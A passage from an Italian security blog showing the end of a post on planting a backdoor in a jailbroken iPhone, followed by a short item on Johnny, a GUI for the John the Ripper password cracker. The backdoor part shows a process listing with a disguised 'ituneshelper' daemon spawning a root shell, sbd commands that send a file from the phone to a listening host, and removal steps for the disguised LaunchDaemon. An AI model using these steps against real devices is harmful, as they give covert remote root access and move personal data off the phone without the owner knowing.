501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

Se per esempio vogliamo trasferire un file dal dispositivo

[email protected]:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file

iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

Infine vi riportiamo la procedura per disinstallare la Backdoor

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
/1 Commento/da

Johnny – Una GUI per John the Ripper

Johnny è una comoda veste grafica per John the Ripper, uno degli strumenti più famosi per il cracking delle password grazie alla sua capacità di unire più sistemi di craking.  Può eseguire la decriptazione di password criptate in DES, MD5 e Blowfish. Sono stati aggiunti moduli addizionali che estendono la sua capacità, includendo anche sistemi di decriptazione MD4 presenti in LDAP e MySQL.

Johnny è stato sviluppato per sistemi operativi a 32 o 64bit con l’intento di semplificare la vita all’Auditor date le molteplici opzioni disponibili in John the Riper. È possibile scaricare gratuitamente il software attraverso il sito internet ufficiale: http://openwall.info/wiki/john/johnny

Via | The Hacker News

/2 Commenti/da